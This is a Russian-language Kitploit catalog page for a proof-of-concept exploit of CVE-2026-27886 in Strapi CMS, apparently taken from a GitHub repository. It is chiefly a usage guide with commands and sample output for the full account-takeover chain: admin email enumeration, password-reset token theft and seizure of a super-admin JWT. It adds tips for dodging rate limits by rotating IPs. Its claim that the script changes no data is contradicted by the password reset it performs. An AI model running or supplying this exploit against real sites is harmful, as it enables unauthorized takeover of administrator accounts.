Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-27886-PoC-Account-Takeover — Полный PoC захвата учетной записи для CVE-2026-27886 в Strapi CMS | Kitploit
Инструменты/GitHubGitHub/thesw0rd/cve-2026-27886-poc-account-takeover
РазведкаАтаки на ПаролиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubthesw0rd/cve-2026-27886-poc-account-takeover

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-27886-PoC-Account-Takeover

Полный PoC захвата учетной записи для CVE-2026-27886 в Strapi CMS

Репозиторий
233 месяцев назадЕщё не проверено

CVE-2026-27886 Автоматический эксплойт - Руководство по использованию

Что делает этот скрипт

Автоматизирует полную цепочку захвата учетной записи в 4 группах HTTP-запросов:

  1. Проверка уязвимости - Подтверждает, что цель уязвима
  2. Перебор email - Извлекает email администратора через булевый оракул (~500 запросов)
  3. Запуск сброса пароля - Инициирует поток восстановления пароля Strapi
  4. Кража токена - Похищает 40-символьный токен сброса (~320 запросов)
  5. Захват учетной записи - Использует украденный токен для получения JWT суперадминистратора

Базовое использование

Режим только проверки (Безопасный)

Проверить, уязвима ли цель, без эксплуатации:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles --verify-only

Полный эксплойт (Самый быстрый)

Автоматизируйте все, если вы не знаете email администратора:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles

Вывод:

root@kitploit:~
[+] Target: https://target/api/articles
[+] Base URL: https://target
[*] Verifying vulnerability...
    [+] Vulnerable: baseline=12, where_test=0
[*] Enumerating admin email...
    [email protected]
[*] Triggering password reset for [email protected]...
    [+] Password reset triggered (HTTP 204)
[*] Extracting 40-char reset token...
    [100%] d1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a
[*] Resetting password with stolen token...
    [+] Password reset successful!
    [+] JWT: eyJhbGciOiJIUzI1NiIs...
    [+] User: [email protected] (ID: 1)

[+] SUCCESS! Admin account compromised.
[+] JWT Token:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...

Пропустить перебор email (Быстрее)

Если вы уже знаете email администратора (экономит ~500 запросов):

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected]

Пользовательский пароль

Установите пользовательский пароль вместо стандартного:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --email [email protected] \
  --password "MyPassword123!"

Добавить задержки (Избежать ограничений частоты)

Если на цели установлено ограничение частоты:

root@kitploit:~
./cve-2026-27886-exploit.py https://target/api/articles \
  --delay 0.1

Это добавляет 100 мс между каждым запросом (~2-3 минуты для полной эксплуатации).

Явный базовый URL

Если конечные точки /admin/* находятся на другом хосте:

root@kitploit:~
./cve-2026-27886-exploit.py https://api.target/articles \
  --base-url https://admin.target

Частые проблемы

"Не-JSON ответ"

  • Неправильная конечная точка (не коллекция Strapi Content API)
  • Попробуйте: https://target/api/products, https://target/api/articles и т.д.

"Не удалось перебрать email"

  • Коллекция пуста (нет внешних ключей updated_by_id)
  • Роль администратора не соответствует никому в базе данных
  • Попробуйте другую конечную точку, если их несколько

"Не удалось извлечь токен сброса"

  • Сброс пароля не был инициирован
  • Email администратора отличается от предполагаемого
  • Токен истек (попробуйте снова, по умолчанию он действует ~24 часа)

"Попадание под ограничение частоты"

  • Добавьте --delay 0.05 или больше
  • Или используйте VPN/прокси для смены IP-адресов

Примечания по безопасности

Этот скрипт:

  • ✅ Выполняет только GET/POST запросы (без изменения данных)
  • ✅ Нацелен только на уязвимый обход параметров запроса Strapi
  • ✅ Использует легитимные конечные точки сброса пароля Strapi
  • ✅ Не оставляет сохраненных артефактов на цели
  • ⚠️ ОЧЕНЬ ЗАМЕТЕН - Выполняет 800+ запросов подряд (очевидно в логах)
Скачать инструмент